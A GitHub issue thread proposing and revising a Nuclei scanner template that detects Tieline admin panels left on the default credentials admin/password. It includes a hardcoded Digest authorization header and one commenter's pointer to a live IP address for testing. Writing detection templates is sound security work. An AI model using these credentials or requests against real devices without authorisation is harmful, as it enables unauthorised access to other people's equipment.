### ISSUE TITLE
Tieline-default-credentials

### ISSUE THREAD

**Issue by pratikkhalane** [projectdiscovery/nuclei-templates#1785]
```yaml
id: tieline-default-credential
info:
  name: Tieline Default Credentials 
  author: Pratik Khalane
  severity: high
  tags: Tieline,default-login
  
requests:

- payloads:
   
     #username - admin
     #password - password

- raw:
     - | 
        GET /assets/base/home.html HTTP/1.1
        Host: {{BaseURL}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: close
        Referer: {{BaseURL}}
        Upgrade-Insecure-Requests: 1
        Authorization: Digest username="admin", realm="Bridge-IT", nonce="",  uri="/assets/base/home.html",      response="", qop=auth, nc=00000001,  cnonce=""
        Cookie: csrfCookie=""


    matchers-condition: and
    matchers:

      - type: word
        words:
          - session
       
         part: header
        # Check for 'session' cookie on valid login in the response header.

      - type: word
        words:
          - Logged in
        part: body
        # Check for valid string on valid login.

      - type: status
        status:
          - 200
```

**Comment by ehsandeep** [comment]
Hi @pratikkhalane, thank you for sharing this, can you share some references to this?

**Comment by pratikkhalane** [comment]
Yes ofcourse , the reference can be found here

Link :
https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c

**Comment by gy741** [comment]
When the rule is tested, the following error is output.

Did I test it wrong?

```
[FTL] Error, no templates were found.
```

**Comment by pratikkhalane** [comment]
I will look into this and get back to you.

**Comment by pratikkhalane** [comment]
id: Tieline-default-credentials

info:
  name: Tieline Default Credentials Detection Template
  author: Pratik Khalane
  severity: high
  description: Finding the  Tieline Admin Panels with default credentials.
  reference: https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
  tags: Tieline,default-login

requests:
  - method: GET
    path:
      - '{{BaseURL}}/api/get_device_details'
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
      Referer: '{{BaseURL}}/assets/base/home.html'
      Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'

    matchers:
      - type: word
        words:
          - "gui.system.SystemPanel.ProgramEditor"
          - "gui.system.SystemPanel.SipAccounts"
        condition: and

      - type: word
        words:
          - "401 - Unauthorized"
        part: body
        negative: true

      - type: status
        status:
          - 200

**Comment by pratikkhalane** [comment]
id: Tieline-default-credentials

info:
  name: Tieline Default Credentials Detection Template
  author: Pratik Khalane
  severity: high
  description: Finds Tieline Admin Panels with default credentials.
  reference: https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
  tags: Tieline,default-login

requests:
  - method: GET
    path:
      - '{{BaseURL}}/api/get_device_details'
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
      Referer: '{{BaseURL}}/assets/base/home.html'
      Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'

    matchers:
      - type: word
        words:
          - "gui.system.SystemPanel.ProgramEditor"
          - "gui.system.SystemPanel.SipAccounts"
        condition: and

      - type: word
        words:
          - "401 - Unauthorized"
        part: body
        negative: true

      - type: status
        status:
          - 200

**Comment by pratikkhalane** [comment]
id: Tieline-default-credentials

info:
name: Tieline Default Credentials Detection Template
author: Pratik Khalane
severity: high
description: Finds Tieline Admin Panels with default credentials.
reference:
https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
tags: Tieline,default-login

requests:

- method: GET
path:
  -  '{{BaseURL}}/api/get_device_details'
 headers:
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
     Referer: '{{BaseURL}}/assets/base/home.html'
    Authorization: 'Digest username="admin", realm="Bridge-IT",
nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details",
response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001,
cnonce="ae373d748855243d"'

matchers:

- type: word
words:

- "gui.system.SystemPanel.ProgramEditor"
- "gui.system.SystemPanel.SipAccounts"
condition: and

- type: word
words:

- "401 - Unauthorized"
part: body
negative: true

- type: status
status:

200

>

**Comment by pratikkhalane** [comment]
this is the updated one and if you want to test on a live website you can go to http://23.31.171.45/

**Comment by gy741** [comment]
Hello, @pratikkhalane 

```'{{BaseURL}}/api/get_device_details'}``` This phrase throws a template error.

I modified the template as below.

What do you think?

```
id: Tieline-default-credentials

info:
  name: Tieline Default Credentials Detection Template
  author: Pratik Khalane
  severity: high
  description: Finding the  Tieline Admin Panels with default credentials.
  reference: https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
  tags: Tieline,default-login

#Payloads:

#Username - admin
#Password - password

requests:
  - method: GET
    path:
      - '{{BaseURL}}/api/get_device_details'
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
      Referer: '{{BaseURL}}/assets/base/home.html'
      Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<SERIAL>"
          - "<VERSION>"
        condition: and

      - type: word
        words:
          - "text/xml"
        part: header

      - type: status
        status:
          - 200
```

**Comment by gy741** [comment]
And, It would be better if you add a favicon detection rule.

https://github.com/projectdiscovery/nuclei-templates/blob/master/technologies/favicon-detection.yaml

**Comment by gy741** [comment]
Using regular expressions to identify values also looks good.

```
  - type: word
        words:
          - "<SERIAL>"
          - "<VERSION>"
        condition: and
```
